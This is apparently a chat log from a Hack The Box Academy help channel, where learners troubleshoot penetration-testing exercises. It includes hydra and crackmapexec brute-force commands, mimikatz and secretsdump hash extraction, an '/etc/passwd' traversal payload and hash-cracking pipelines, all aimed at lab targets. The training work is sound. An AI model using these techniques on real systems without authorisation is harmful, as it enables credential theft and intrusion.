But thank you for the reminder I apologize. Illegal hacking is not okay

oh, i misunderstood. disregard what i said

Do anyone know Nmap

sorry, made a mistake. i unfortunately don't know the path but here's a list of resources that may be of use
https://github.com/dsasmblr/hacking-online-games

Whats ur question about nmap

Yes my good man I was trying to say that if I scan a network or a website the results what can I use it to do

Because I already have a lot of results with me

Which module ur on

You are talking about the machine I'm just using Windows but if you're talking about the version of the End map let's just say is the updated one like if you want to download it you just see the one they just recommend to you or maybe I'm the one out of line if you can be more specific please

What are you hacking / attacking with nmap

(btw just recently discovered its illegal to nmap anything without permission)

Cause in the law it says any snooping is evidence that u want to invade privacy or steal stuff

The website you can use to test the tool

what module

Scanme.nmap.org

Go to HTB ACademy and learn professionally from the best training

Instead of nmaping that website

ty

apparently the site is for testing Nmap

dunno why it's not loading the page

1. You can then check service versions for available CVE (public exploits)
2. U can fingerprint (check quick check) the services to get more info about them
3. U can then use tools specific to the services to attack them more
4. U can start accumulating data from the services

but the cached result in Google states that the page was made for testing Nmap installs and learning more about the tool

And about this message before I like installed in some few days ago I tested it in some website and I promise I did not take anything from that website seriously am I still going to jail

but yea, this doesn't concern an Academy module

Dont tell us that u did something illegal if someone is not busy they will report u to law enforcement

hi I'm in Password Attacks module's pass the hash section. is there any way someone can help me with question 3? I am in David's user folder trying to get the hash. I looked in the hidden ssh subfolder and got a hash but it wasn't the right hash value.

just don't do it again without explicit permission

what have I done again

I'm trying to get David's password hash

if you want to learn more about Nmap, HTB Academy has a module for using the tool

I mean his account hash

ty boss

https://academy.hackthebox.com/course/preview/network-enumeration-with-nmap

ty

can someone help me I used type command in cmd prompt and Get-Content in PowerShell to read the known_hosts file in david's folder it doesn't seem like I'm going in the right direction?

if someone could give a hint that would be good

I'm researching mimikatz and don't see a clear tutorial on how to get account hash for current user

Award to slowest module in all of cpts path goes to pivoting tunneling and port forwarding - RDP and socks tunneling with socks over RDP

Shit took my 2 hours and a half while i ALREADY knew exactly what to do, just to type the commands

Frustrating

Hello agin. Im in Skiss assesment last question; "After cracking the NTLM password hashes contained in the NTDS.dit file, perform an analysis of the results and find out the MOST common password in the INLANEFREIGHT.LOCAL domain. " Iv been cracking all the hashes and get a list with all the passwords in a .pot file and now iv been sorting the list and run some sorting and at last uniq -c sorted_passwords.txt > counted_passwords.txt and get a list with the most user passwords, but thay iv got is just user about one time ore someting, iv been trying the number one in my sortet list but is not the correct and the other in the list is nott correct etiher.. Hm, vad im doing worong at this last qusetion? Plz can some one help me out?! Im going Crazy

Was trying some grep to...

the module is "Cracking Passwords with Hashcat " btw

You want to focus on windows specific data, which is SAM or system memory where hashes are, now you can typically use mimikatz to interact with windows authentication mechanisms, aswell as NTML hashes, if you target hashes from other users you gotta extract them from SAM database directly, with system priviliges of course, sekurlsa::logonpasswords relies on LSASS, which means it stores data in memory

Everyone always gives the GET /../../etc/passwd for Local File Inclusion yet I don't get how that's supposed to be any different from a Directory Traversal attack. Is LFI supposed to be a subset of the latter? Per ChatGPT, the difference is that mere Directory Traversal is read-only for the attacker whereas LFI leverages runtime code execution. Is this correct?

Lfi allows for code execution to a degree

And finding files you typically shouldn't

yes, with wrappers

Ah, i was thinkin it was someting like what you saying, just use the NTML hashes..

Im not sure how to extract just the NTML haseses , the module did not tell me anyting about it. but ok, thanx, now i have someting to go on!

And the name is dumb. "Local" in IT always means from your machine, if I'm manipulating the server then that's remote smh

"local" in this case means local [files] on the web server

there is remote file inclusion, which involves the web server being able to access files on other servers

Without sanitization someone could easily exploit LFI, but when application allows remote execution they can leverage the vulnerability to execute arbitrary code, which means it's much more dangerous then

It's a subset of directory traversal only in context when someone executes files

im trying to extract with secretsdump.py but in my own computer with EOS(endevaouros) i get this error, cuz i dond have the files needed: secretsdump.py -ntds DC01.inlanefreight.local.ntds LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[-] Either the SYSTEM hive or bootkey is required for local parsing, check help

gah...

You need to manually gather SAM and SYSTEM hives or NTDS.dit, with bootkey from SYSTEM hive, it should encrypt hashes, make sure you reference them correctly

Dont you mean its a subset of dir traversal only in the context where the attacker doesn't execute files? Because it would be the code execution that would make it distinct supposedly.

Otherwise they're both just viewing files/traversing dirs

but... how to manually gather SAM and SYSTEM hives or NTDS.dit i have no target just the file ntds DC01.inlanefreight.local.ntds downloaded from the skill assesment.. This cant be the solution, the module did not cover anything about this at all ..

It becomes distinct from a simple directory traversal attack once you inject the code, depends how someone executes code, with a file or with something else

You can still extract them with impacket, but tool will probably ask for some boot keys to decrypt NTML hashes in ntds.dit , means that they are encrypted and can't be extracted without the boot key, unless you have access to the boot key you can't extract them directly

Thanx

I'm on the command injection skill assessment and found the injection point but can't find the flag I've run {ls,-la}, Obfuscated versions of ls with various quoting and even the find command such as find / -type f -name "flag.txt" in an Obfuscated format to bypass denied "malicious request"

that means there's a filter you need to figure out a way to bypass it

When a module asks me to enumerate the internal network I need to enumerate using that private ip right?

Pivoting tunneling and port forwarding - skills assessment - question 3

yeah, internal network is the private network, not public facing.

By searching modules channel, i found some link to writeup that contained the correct answer.

To save you time for searching, i will not give exact answer, just mention:

1. file command is fully enough to obtain all you need;
2. Correct answer consist from two parts, separated by space, it consists of around 11 chars, including space;
3. The first part designates binary type; the other part - count of bits, including sufix '-bit';

Good luck to format everything you already know!

The question says to use mimikatz right?

Ok so I looked it up and the ip that was to be found was a public one. Idk why the question said to enumerate for a private ip

not the way you phrased the question

i'd need more details like module/section to know more, but purely based on your question that's wrong. internal network = private ip, not public.

inherently by definition a private network is not public

The question is:
Enumerate the internal network and discover another active host. Submit the ip as the answer

And the answer is a public ip 😑

module and section?

Pivot tunnelint and port forwarding - skill assessment - question 3

that is a private IP my guy

not public

Oh ye

I'm used to seeing 3 digits at the beginning and thinking it's public

https://docs.microfocus.com/NNMi/10.30/Content/Administer/NNMi_Deployment/Advanced_Configurations/Private_IP_Address_Range.htm

there are only 2 ranges that start with 3 digits that are private, and 1 2 digit range. the overwhelming majority are public.

@cloud urchin U finished the room?

yes

Idk if I'm doing the right command to find that ip

Can I send here or do I dm

it might be covered under the networking behind pivoting section

Can I send the command here?

I copied it from the first module with questions

are you actually connected to the computer you need to find the ip on?

But everyone is crazy abt these things you cant share them in public etc

Yes I sshd into it with dynamic port forwarding and changed proxy chain file and rn I'm using nmap ping sweep for that ip address range that I found on the forum. I'm getting some weird stuff as result from nmap, it hasn't finished yet and it keeps starting over and over again

did you complete the Active Directory Enumeration and Attacks module yet?

No didn't even start it

It's the next in order

Thx for help

nmap should work. there are a few ways to do it really..

So what I described is correct?

Like what I'm doing with ssh and port forwarding and nmap

idk i don't think i used that but i also dont know what command you did. nmap can find hosts if it works through port forwarding

Ok can I dm u

Btw if there's an admin here I would like to know what can be shared or not

if you're connected to the target ip the commands are in the "The Networking Behind Pivoting" like i mentioned

otherwise nmap, ping sweep

i believe metasploit can also do a ping sweep

The only commands in networking behind pivoting are ifconfig ipconfig and netstat -r

yeah if you're connected that should work. but idk if you're connected to the target in question etc

I'm not understanding

Why would ifconfig let me find the ip in the network

It's showing me the ip on the machine

right it shows the IP's on the machine you're on, that's why i said if you're connected to the machine it'll show you

Why would I care abt the ip im on, it's like the first thing you do after you land on the webshell

Like it's not getting me closer to answering the question

ok then use one of the other 3 techniques i mentioned lol

Aight np

If there's someone else who did this module pls tell me idk if I'm going in the right direction

Wtf why are they all up

@rustic sage I'm trying to find the ip to pivot to in the network. I used dynamic port forwarding , edited the proxy chain file with the right port, and did nmap ping sweep with proxychain to find a host that's up. It found 256 hosts up

And people on the forum are talking about CMD scripts and I have no idea why

pretty sure you can't get an ICMP reply through a forward like that

I think I got 256

They are all up

Maybe try to just SSH into that host and run a one-liner.

That's all the IPs bro.

The module goes over this, review the Meterpreter Tunneling and Port Forwarding section

Hey team - new to HTB. How do I prep for the CTFs? When I try to join a CTF it says I have to join a team. Do I just create a team of me?

This channel isn't for asking that

maybe ask in #1296444291291287633

Wdym one liner?

Yea

Ping sweep

I may be doing something wrong

Think for i .....

Yes you are

Yeah I tried it kept kicking me here.

Read #welcome and #rules to access it

you'll need to verify your account by following the instructions in #welcome

It's likely in the module. I'm not at my computer to check, but I'd say it's highly likely it's in the module.

At the beginning I was trying to upload nmap to the host but then I couldn't and did the port forwarding thinf

You can do a ping sweep with bash

Don't make it overly complicated.

Oh shit

Like Ceald said.

I'll try in a min

Check hack tricks or just Google it

bro i told you that like 30 mins ago

Where

at 4:48pm pst

i said ping sweep, nmap, metasploit, or the ipconfig command

then later i gave you the section to review to see those commands

Mh must have lost focus

I was touching my weenie while reading on the phone

I'm trying to find the ip to pivot to in the network. I used dynamic port forwarding , edited the proxy chain file with the right port, and did nmap ping sweep with proxychain to find a host that's up. It found 256 hosts up @wary plover

Bash script isn't giving output

re-read the "Meterpreter Tunneling and Port Forwarding" section, it explains how to do all of this

Dude i just hopped on there and did not get 256 results back.

which module is this ?

Pivoting skill assessment

Idk I might be an idiot, bash script isn't giving results

how many times did you run it?

Send me a DM so I can ask a couple of questions.

everytime i spawn target, it goes to timeout, spawned target about 3 to 4 times

hmmm been a while since i done that assessment, booting it up right now

Try adding the parameter --smb-timeout 5

@rustic sage did you find the credentials on the webserver?

Multiples

Ok one moment

Yes and I sshd into the thing as webadmin

ok then there should be another host active in the 172. subnet

Using ssh port forwarding gives me 256 hosts and bash script is frozen

hmmm i used ligolo for the pivoting part :/, maybe the metasploit one could help as it says in the hint

Yes but I'm the question before that

this question right

Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer.

did you review the section i mentioned?

Yes but it worked on the pwnbox

Yes it worked on the pwnbox

This place is not so shitty : )

Thx guys

yeah general can be quite hectic, better to go to here for questions regarding modules, happy hacking!

If all ports on the ip are filtered does it mean the pivoting to webadmin wasnt successful?

It doesn't give me error when using nmap against 172.x.x.x but all ports are filtered. Also rdp

Thanks! I figure it out.

Hi!

Has anyone encountered this issue when trying to upload an SVG file containing an XXE script in the Limited File Uploads module? Clicking on the upload button to upload the malicious SVG file does nothing. So far, I have tried the following:

-Using both Firefox and Google Chrome web browsers on Kali.

-Using a new Kali VM image and attempting to upload the SVG file.

I have no problem uploading the SVG file in both Tor Browser and Pwnbox, so I’m unsure what the issue could be.

Hello guys

Click the HTB logo

Hi, thanks for your help! I am able to upload any image file, but when the file contains an XXE payload, the upload button does not function upon clicking it. However, there is no issue with the Tor Browser; I was able to upload the XXE file and view its content.

i used burp so idk

my burp doesn't load when I try to send the xxe payload too. It just stuck at sending which is weird

Hi

Is there no daily refresh for pwnmachine the way there is on tryhackme?

Hello agin... I'm going crazy.
Yesterday I finished all the questions in the Skill Assessment for Cracking hashes with hashcat except for the last question which reads:

After cracking the NTLM password hashes contained in the NTDS.dit file, perform an analysis of the results and find out the MOST common password in the INLANEFREIGHT.LOCAL domain.

I'll start with that
create a file with only hashes for NTLM and then crack them and then get a list that looks like this:
4f09bae1f5ededfff7fc8039304e4782:*****

then cut -d ':' -f 2 cracked_passwords.txt > passwords_only.txt to sort out the passwords only

and further sort passwords_only.txt | uniq -c | sort -no > password_frequencies.txt
to count the occurrence of passwords

finally head -n 1 password_frequencies.txt which finds the most common password.

So far so good, but the problem is that password is used only once in the whole file and the answer is wrong, I tried to make a slightly longer list of the most common password, but no password in the file is used more than once.

I have tried different techniques but I get the same password in response.

Have I got it wrong, is it which password is the most common overall ie most used worldwide and not just which password is the most common in the list of passwords from the cracked hashes or what am I doing wrong?

I'm having a stupid amount of frustration on the Using the Metasploit Framework Payloads module as I keep getting "exploited completed but no session created" I've set my LHOSTS to the VPN IP and I know I chose the correct payload. Any help would be appreciated because I've restarted my vpn several times, waited for the target ip to spawn several times to redo it, and it's beyond frustrating.

I've had big problems with reverse shell from my own machine via vpn to htb targets.. I went crazy myself, I used different types of reverse shell and nothing worked except at the end, then I used https://www.revshells. com/ but maybe it's not the reverse shell you're using? I noticed that even with a shell that worked, it didn't always work.. Try doing the exercise via pwnbox instead, because it seems to be difficult to do it via VPN..

I'll give that a shot, it's just been beyond frustrating man and I appreciate your help.

I know the feeling, im going crazy some times at HTB Academy.. Often solution is not written about in module or the correct method not works at all..

It just worked and loaded me into a shell same everything I used on my VM, it must be a VPN issue. I've been having a lot of issues in general using my VM having to restart the VPN service a few times, but it's been happening more frequently here lately.

Like now, im in last question for a skill assessment and im going crazy about it.. done all the things but it os wrong, and the module did not tell how to do everything so i was forced to finde knowlage outside...

Ah.. Like i was beliving..

I sat for many hours when I had the same problem.. In the end it worked but as I said not all the time, so it seems to be a problem with just such things via VPN

Maybe you or even I should report the problem to them, but they are probably aware of it, but it's good to pay more attention to them so they might prioritize

I know how you guys feel

I pwned several machines today but my brain is hurting so much

So many frustrations and struggles. It's good to take breaks and rest

What can disturb a lot is that in several cases the information you get in the mudle is insufficient to solve all the questions in the assessment, of course I understand that you might have to search for some information yourself etc. and not get a solution fed to you, but sometimes it feels like certain things are simply missing in a module..

Do they have a support that I can go through to submit the issue?

yes

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Exactly. I understand the try harder mentality and that's what hacking is all about, but it does seem like some things are genuiely broken at times and difficult to find information for a fix.

Awesome thanks man

Np

Yes, of course it's like that, that they want us to solve things ourselves and think outside the box, but as you say in some cases it's broken and it's not really that strange, but very disturbing.. The only thing we can do to do is to report

I finished all the questions in the Skill Assessment for Cracking hashes with hashcat except for the last question which reads:

After cracking the NTLM password hashes contained in the NTDS.dit file, perform an analysis of the results and find out the MOST common password in the INLANEFREIGHT.LOCAL domain.

I'll start with that
create a file with only hashes for NTLM and then crack them and then get a list that looks like this:
4f09bae1f5ededfff7fc8039304e4782:*****

then cut -d ':' -f 2 cracked_passwords.txt > passwords_only.txt to sort out the passwords only

and further sort passwords_only.txt | uniq -c | sort -no > password_frequencies.txt
to count the occurrence of passwords

finally head -n 1 password_frequencies.txt which finds the most common password.

So far so good, but the problem is that password is used only once in the whole file and the answer is wrong, I tried to make a slightly longer list of the most common password, but no password in the file is used more than once.

I have tried different techniques but I get the same password in response.

Have I got it wrong, is it which password is the most common overall ie most used worldwide and not just which password is the most common in the list of passwords from the cracked hashes or what am I doing wrong?

both the methods which they showed is not working.

Hello,

I am experiencing an issue with my HTB Academy account. My student subscription was unexpectedly closed, and I am unsure of the reason. Could someone please assist me in resolving this matter?

Contact support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Wooov, i did it.. hehe, after about 10h and alot frustration... woop woop

is it a module just about Burp?

Attacking Wi-Fi Protected Setup (WPS) anyone finished that module?
I'm can't brute force PIN with reaver....

what tool u using?

https://academy.hackthebox.com/module/144/section/1255 can anybody help me with this module i know i probably need to set something up but idk what i added inlanefreight.htb to /etc/hosts whenever i try to do i zone transfer tho i just get nothing back

the module doesnt really go in depth ngl

Hey everyone, I’m stuck on the Password Attacks Lab - easy from the password attacks module.
I’ve tried crackmapexec and hydra ftp and ssh to target -u (user list given by resources) -p (password list given by resources) .
I’ve gone to the forum that says they find a password with the user Mike but this doesn’t work either.

I’ve also tried mutating the password file with the custom rule provided and created a mutated file from Inlanefreight, not getting any positive responses on any usernames or passes

‘Crackmapexec ftp 10.129.96.146 -u username.list -p password.list’

Crackmapexec ssh 10.129.96.146 -u username.list -p password.list

Hydra -L username.list -p password.list ftp://10.129.96.146 -vv

But no success

FTP - On the responses for crackmap I get a negative and (response ‘NoneType’ object has no attribute ‘sendall’)

SSH - I was getting the error bad authentication type; allowed types; publickey’ but then also get authentication failed

Give me 1 sec let me try

Thank you!!

please help with https://academy.hackthebox.com/module/144/section/1255#questionsDiv i keep getting connection timeout on both my machine and pwnbox idk what i have to setup to make it work but clearly im missing something

ah ok. attacking the FTP using hydra is the step in the right direction

yh you use hydra for it all

Ah right, I didn’t realise hydra would give different results to crackmap, is my syntax wrong on hydra, just checked, shouldn’t it be -P rather than -p 🤦🏼‍♂️😂

yes -P is to provide a list -p is to provide a password you already know

-L for username.txt, -P for password.txt

😩 that’ll be my mistake then, will give it a couple rounds on hydra, sorry for the silly mistake haha.

dont worry bout it

I really appreciate the help, trying to get through and pass CPTS before mid Jan but it’s slow going at times

are u using the pwnbox?

nvm lmao im blind.

tried both

whats ur dig command looking like

i tried a bunch the one im getting connection timeout with is 'dig axfr inlanefreight.htb @inlanefreight.htb' all the others i tried legit just do nothing

did u add the ip into ur /etc/hosts

yes

did it to /etc/resolv.conf aswell

oh my i was looking at my own notes and realised that they revamped the module 💀

exactly thats why im re doing it but shit just dont work

this isnt the only section i had this issue either

the whole module just doesnt work

@teal sparrow u might have to hang on for abit, i dont have access to a proper com/machine to redo this module on

whats ur hashcat mode?

22000

I did it a couple months ago, I’d connect to it but just on a long wait for brute forcing with hydra haha, not sure if this was the one where you had to point it to a different dns than just inlanefreight.htb might need to try a subdomain.

Like zone transfer from the base url and then try again from one of the subdomains found I think. Can’t remember, but will try asap

the section gives no details tbh its kinda annoying it just gives u one command

@dim ridge @idle marsh found the issue i had multiple VPN connections e.g. tun0 tun1 tun2 no idea how but i just killed them all and it worked

Nice!!

nvm I solved it tnx

oh bruh hahahaha

If you’re doing CPTS and they renew a module do you have to go back and complete it before the exam? 😬

Probably yeah you require 100% completion for the exam

its pretty weird actually. some of the modules which was reworked i had to redo, while some (like this DNS) one i was completely unaware it was changed.

this renew sucks because they changed all the questions aswell but you cant input new answers to check if your right

i remembered re-doing login brute force recently.

yup.

Hi.
I'm currently at the Password Attacks Module, in Network Services section.
In the exercise, it asks for 4 flags for 4 differenet users.
I got the WinRM, SSH, and SMB.
The thing is I've been waiting for almost more than 3 hours on RDP and it did not show up yet.
I tried both hydra and netexec, is there an issue with this task or something?

maby use a custom list or some mask, or hybrid...

I though of mutating the passwords but I did not yet reach password mutation section so I though it's irrelevant in this case...

They explained nothing about it in this section either, so why should I try that? isn't the task supposed to be on what's being taught?

I've seen things not mentioned several times in the module that were the solution.. Seems like they want you to think outside the box and use all the different techniques that have been covered in all the modules.. But not sure if it is so just in your case, but it was a thought that slohg me might work

the RDP task is the 3rd one, isn't getting the 4th flag before the 3rd indicates some kind of problem?

will try that, thank you.

Np

Hello guys. I'm on day 3 of trying to connect up to this mysql database for this module. I cannot for the life of me figure out what I'm missing? I keep getting an error saying "Can't connect to local server through socket <file path>."

I've tried the following:
mysql <target ip> -u root -ppassword
mysql <target ip>-u root -p (followed by typing the password on the next prompt).
mysql <target ip> -u -P 3306 -p

Ive also tried maria db and a few other variations of the above. I've also tried using the ephemeral port provided as well after the -P

I'm not sure what the issue is. I can ping it and nmap it just fine.

I just felt dump.....
It turns out netexec did try the credentials but failed, due to the target being shutdown automatically as I spent a lot of time in this task 🥲

done it, been there

The error suggests there’s an issue with the socket file path. By default, MySQL uses a socket file for local connections (on Unix-based systems). Sometimes the socket file is not located where the client expects it.

So how do I troubleshoot that? Just trying to locate it?

Am I just blind? I can't find the mac VM to do the MacOS fundamentals module

first you can make sure the port is correct with nc -zv <mysql-server-ip> 3306

If the connection is successful, it means MySQL is listening on that IP and port.

so i went to /run and there is no mysqld folder (its trying to use /run/mysqld/mysqld.sock).

And I'll do what you just said now.

I got the hash being used more than once.

You can DM what you have tried.

I did solove it, i was forget to use --username and then make a hashfile with the format: INLANEFREIGHT\Lynne.Thompson:31d6cfe0d16ae931b73c59d7e0c089c0

just a thought.. suspect you performed this locally on your own machine!? try doing the task via pwnbox instead, it can help sometimes, if you're not already doing it

I did... would it make a difference? Its a vm all the same right?

What I myself have noticed and heard that others have had problems with is that when you run via your own machine and connect via vpn, some things can go wrong, tx I and others have had a lot of problems with reverse shell when we run via vpn..

On brute forcing SMB I find I always get a false positive on users that don’t exist, is this common, how do we get around this

it is common when your command is not like it suppose to be...

I'm getting the same errors

in pwnbox*

What is it supposed to be? Hydra -L username.list -P password.list smb://IPADDR

ommand for Workgroup Environment (No Domain): If the SMB server doesn't use a domain, run:

hydra -L username.list -P password.list smb://IPADDR

Command for Domain Environment: If the SMB server uses a domain (e.g., INLANEFREIGHT), format your username.list with domain prefixes:

INLANEFREIGHT\username1
INLANEFREIGHT\username2

Then run:

hydra -L username.list -P password.list smb://IPADDR

Adding Verbosity: Use the -V flag to see each login attempt, which can help debug false positives:

hydra -L username.list -P password.list -V smb://IPADDR

Ah nice one thank you, well explained

im not 100% but i should work

and if you need dont forget to add posts to your hosts file

let me know if it was to anny help

Was able to get what looks like the file with a guest auth

whats a good resource to practice sql injection queries

streamio from the main platform helped me alot

Maby some HTB boxes or download boxes for vm from vulnhub

This is not the server for this buddy.

^

lmao

what even was that

use markdown notation for posting these big chunks

That was chat copy paste

they shouldn’t even mark up that, just refrain from doing so

It still comes back with a false positive

Hmmm.. i remember i was having some struggle with Medusa and false positives , i don really remember but i like to think it was something with the syntax in hydra, hmm.. dam, cant remember, im so sorry, if my mind get it back i tell you at the same moment

Ah, now i remember, for me the solution was use smb:\\ and not //

Smb:\\

Maby it is the way to go for you 2, i hope so.

If the smb is on a Windows machine it use \\ not // often

Hi everyone,
I'm still at my beginning.
I'm on the module 'Attacking Web Applications with Ffuf' on the chapter: 'Sub-domain Fuzzing'
on the question part, it tells me: 'Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it? '

I know how to fuzz on a subdomain but when I try it, I have no result. So I assume that there is no public DNS, I would like to solve it in /etc/hosts but the problem is that I have no IP to associate.
Where am I going wrong?
I've been on this for a while if someone could give me a clue

If i remember correct it was not . Com you should use it was .htb and put it all in your hosts file, can check my notes for it in a minute..

What wordlist are you using?

in mu notes iv was using: ffuf -w /home/julle/Dokument/HTB/WebApplications/Ffuf/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.com/

i'm using this subdomains-top1million-5000.txt

by doing this I get nothing

I was using subdomain top1million 110000

try with [julle@HaxBox Ffuf]$ ffuf -w pathtolist/subdomains-top1million-5000.txt:FU
ZZ -u https://FUZZ.inlanefreight.com/ for me it worked

But i doubt it's that

Seems right

the question was; Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it? ?? iv get the the text in my notes telling me the subdomain

I have already done the command you sent me but it does not return any subdomain.
I guess it is linked to a private DNS. Or am I doing something wrong?
If so, should I not add the IP and name association in my hosts file?
If so, where can I find the IP?

i did not write exactly what i did do, normal i note all steps, but did not this time... sorry

i can tell you what is in my notes without tell you the answer if you like..

hope my notes can help you on the way

If you need host just look up what ip inlanefreigth.com use

when you say: 'just look up the IP address used on inlanefreigth.com',
trying an nslookup on inlanefreigth.com I see that the IP is resolved but trying the ffuf again, I still get nothing

I have a question about the privesc module, I acknowledge that we are looking up privileges to exploit processes on service accounts, but wouldn't that require us gaining control to those service accounts to begin with?

Hello guys, I'm on linux fundamentals Filter contents page,
The question i have to answer is "How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)"
Now, i have found i way to do this using the netstat command by filtering only the listening traffic, only tcp and udp and filtering out the localhost and ipv4
but, the response that i get with wc -l is 8, which is technically the truth since the response does contain 8 lines but 2 of the lines are "headers" so to say, so that would make the actual number of connections 6
but the correct answer is 7, is this a bug or am i missing something?